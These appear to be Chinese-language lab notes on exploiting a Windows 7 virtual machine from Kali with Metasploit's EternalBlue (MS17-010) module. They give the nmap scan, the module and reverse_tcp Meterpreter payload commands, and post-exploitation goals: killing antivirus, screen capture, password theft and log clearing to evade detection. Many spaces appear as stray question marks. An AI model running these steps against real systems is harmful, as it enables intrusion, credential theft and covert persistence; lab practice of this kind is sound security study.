win7虚拟机? ? ? ? ip
kali ip:
?采用nat的桥接模式:保证kali和win7能够通信
? ??nmap -sS -A? ? ? ? ? win7ip? ??(查看攻击对象win7所开放的所有端口)
msfconsole
(启动渗透框架)? 看到某个图案的这个渗透框架就运行了?
使用方法 ????进入框架:msfconsole ????使用search命令查找相关漏洞:?search??ms17-010 ????使用use进入模块:??use?exploit/windows/smb/ms17_010_eternalblue??? ????使用info查看模块信息:?info? ????设置攻击载荷:set?payload?windows/x64/meterpreter/reverse_tcp ????查看模块需要配置的参数:show?options ????设置参数:set??RHOST??192.168.125.138 ????攻击:exploit?/??run? ????后渗透阶段?
msfconsole?(查看ms17_010模块工具)
? ? ? 选择攻击模块:
这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击
use? ? ? ? ? ? ? ? ? exploit/windows/smb/ms17_010_eternalblue? (使用攻击模块)
使用模块
search payload? ? ? ? ? ? 搜索攻击载荷??payload(用来查看攻击对象返回信息)
??
设置攻击载荷? ??设置一个反弹信息(渗透攻击后的查看被攻击对象返回的信息)
set payload windows/x64/meterpreter/reverse_tcp?
show options (显示配置选项)
set Rhosts 攻击对象ip (设置被攻击主机地址)
?exploit? ?攻击? (攻击成功)
?攻击成功后可以对被攻击对象做一些操作:? 如关闭杀毒软件,进入终端,窃取屏幕,获取用户密码等
? ?关闭杀毒软件
窃取win7虚拟机的屏幕(屏幕共享)
结果:
?窃取win7的某个用户密码
窃取密码
? ? ? ? 渗透完成后,把需要的事干完了,清除日志(让win7发现不了)
|